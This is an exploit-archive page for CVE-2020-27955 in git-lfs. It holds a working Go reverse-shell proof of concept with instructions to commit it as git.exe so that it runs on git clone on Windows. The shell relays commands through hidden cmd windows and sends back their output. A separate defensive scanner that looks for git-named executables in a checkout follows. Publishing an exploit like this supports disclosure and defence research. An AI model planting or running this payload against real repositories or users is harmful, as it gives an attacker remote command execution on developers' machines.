git-lfs Remote Code Execution

06 Nov 2020 | Reported by Dawid Golunski | Type: packetstorm | Source: packetstormsecurity.com

git-lfs Remote Code Execution (RCE) vulnerability CVE-2020-27955 exploit

Code
```go
/*
Go PoC exploit for git-lfs - Remote Code Execution (RCE)
vulnerability CVE-2020-27955
git-lfs-RCE-exploit-CVE-2020-27955.go

Discovered by Dawid Golunski
https://legalhackers.com
https://exploitbox.io


Affected (RCE exploit):
Git / GitHub CLI / GitHub Desktop / Visual Studio / GitKraken /
SmartGit / SourceTree etc.
Basically the whole Windows dev world which uses git.

Usage:
Compile: go build git-lfs-RCE-exploit-CVE-2020-27955.go
Save & commit as git.exe

The payload should get executed automatically on git clone operation.
It spawns a reverse shell, or a calc.exe for testing (if it
couldn't connect).

An lfs-enabled repository with lfs files may also be needed so that git-lfs
gets invoked. This can be achieved with:

git lfs track "*.dat"
echo "fat bug file" > lfsdata.dat
git add .*
git add *
git commit -m 'git-lfs exploit' -a

Check out the full advisory for details:

https://exploitbox.io/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955.html

https://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.html

PoC video at:
https://youtu.be/tlptOf9w274

** For testing purposes only **

*/

package main

import (
	"net"
	"os/exec"
	"bufio"
	"syscall"
)

func revsh(host string) {

	c, err := net.Dial("tcp", host)
	if nil != err {
		// Conn failed
		if nil != c {
			c.Close()
		}
		// Calc for testing purposes if no listener available
		cmd := exec.Command("calc")
		cmd.Run()
		return
	}

	r := bufio.NewReader(c)
	for {
		runcmd, err := r.ReadString('\n')
		if nil != err {
			c.Close()
			return
		}
		cmd := exec.Command("cmd", "/C", runcmd)
		cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
		out, _ := cmd.CombinedOutput()
		c.Write(out)
	}
}

// Connect to netcat listener on local port 1337
func main() {
	revsh("localhost:1337")
}
```

--
Regards,
Dawid Golunski
https://legalhackers.com
https://ExploitBox.io
t: @dawid_golunski
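A defender-side check for the condition the PoC's usage notes describe (a file committed as git.exe that runs on clone), added here as an example and not part of the advisory or of git-lfs: it walks a checked-out tree and lists files named like the git executable. The names `FindGitShadows` and `shadowNames`, and every extension other than `.exe`, are assumptions of this example.

```go
package main

import (
	"fmt"
	"io/fs"
	"os"
	"path/filepath"
	"strings"
)

// File names that would stand in for "git" on Windows. The page names only
// git.exe; the other extensions are an assumption added for coverage.
var shadowNames = map[string]bool{
	"git.exe": true, "git.bat": true, "git.cmd": true, "git.com": true,
}

// FindGitShadows walks a checkout and returns the paths of files named like
// the git executable. The .git metadata directory is skipped.
func FindGitShadows(root string) ([]string, error) {
	var hits []string
	err := filepath.WalkDir(root, func(p string, d fs.DirEntry, err error) error {
		if err != nil {
			return err
		}
		if d.IsDir() {
			if d.Name() == ".git" {
				return filepath.SkipDir
			}
			return nil
		}
		// Windows file names are case-insensitive, so GIT.EXE counts too.
		if shadowNames[strings.ToLower(d.Name())] {
			hits = append(hits, p)
		}
		return nil
	})
	return hits, err
}

func main() {
	for _, root := range os.Args[1:] { // each argument is a checkout to scan
		hits, err := FindGitShadows(root)
		fmt.Println(root, hits, err)
	}
}
```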
